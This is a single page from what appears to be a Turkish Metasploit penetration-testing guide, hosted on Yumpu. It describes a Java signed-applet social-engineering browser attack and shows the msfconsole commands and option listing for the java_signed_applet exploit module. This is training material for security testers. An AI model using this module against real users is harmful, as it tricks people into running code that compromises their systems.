Metasploit framework-Kullanim rehberi 0.8
30.11.2012 Views
Share Embed Flag

Metasploit framework-Kullanim rehberi 0.8

Metasploit framework-Kullanim rehberi 0.8

Metasploit framework-Kullanim rehberi 0.8

SHOW MORE
SHOW LESS
ePAPER READ
DOWNLOAD ePAPER
fozavci

Create successful ePaper yourself

Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.

START NOW

<strong>Metasploit</strong> Framework ile Sistem Sızma Testleri Aralık 2012<br />

Bir diğer platform bağımsız web tarayıcı exploit'i ise imzalı Java applet'inin kullanıcıya<br />

çalıştırtılmasıdır. Çalıştırılan sahte web servisi ile kullanıcıya güvenilmeyen imzaya sahip<br />

bir Java applet'i sunulmakta ve çalıştırması istenmektedir. Eğer kullanıcı karşısına çıkan<br />

Java sanal makinesinin güvenilmeyen sertifika uyarısını okumaz ve kodu çalıştırırsa<br />

sistem ele geçirilebilmektedir. Bu noktada denetmen, web tarayıcılarının güvendiği bir<br />

sertifikaya sahip ise imzalama için SigningCert, SigningKey ve SigningKeyPass<br />

değişkenlerini tanımlayabilir.<br />

msf > use exploit/multi/browser/java_signed_applet<br />

msf exploit(java_signed_applet) > info<br />

Name: Java Signed Applet Social Engineering Code Execution<br />

Module: exploit/multi/browser/java_signed_applet<br />

Version: 15518<br />

Platform: Java, Windows, OSX, Linux, Solaris<br />

Privileged: No<br />

License: <strong>Metasploit</strong> Framework License (BSD)<br />

Rank: Excellent<br />

Provided by:<br />

natron <br />

Available targets:<br />

Id Name<br />

-- ----<br />

0 Generic (Java Payload)<br />

1 Windows x86 (Native Payload)<br />

2 Linux x86 (Native Payload)<br />

3 Mac OS X PPC (Native Payload)<br />

4 Mac OS X x86 (Native Payload)<br />

Basic options:<br />

Name Current Setting Required Description<br />

---- --------------- -------- -----------<br />

APPLETNAME SiteLoader yes The main applet's class name.<br />

CERTCN SiteLoader yes The CN= value for the certificate. Cannot<br />

contain ',' or '/'<br />

SRVHOST 0.0.0.0 yes The local host to listen on. This must be<br />

an address on the local machine or 0.0.0.0<br />

SRVPORT 8080 yes The local port to listen on.<br />

SSL false no Negotiate SSL for incoming connections<br />

SSLCert no Path to a custom SSL certificate (default<br />

is randomly generated)<br />

SSLVersion SSL3 no Specify the version of SSL that should be<br />

used (accepted: SSL2, SSL3, TLS1)<br />

SigningCert no Path to a signing certificate in PEM or<br />

PKCS12 (.pfx) format<br />

SigningKey no Path to a signing key in PEM format<br />

GamaSEC Bilgi Güvenliği Denetim ve Danışmanlık Servisleri Sayfa 132

logo

products

Resources

Company

Terms of service
Privacy policy
Cookie policy
Cookie settings
Imprint
Change language
Made with love in Switzerland
© 2024 Yumpu.com all rights reserved

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!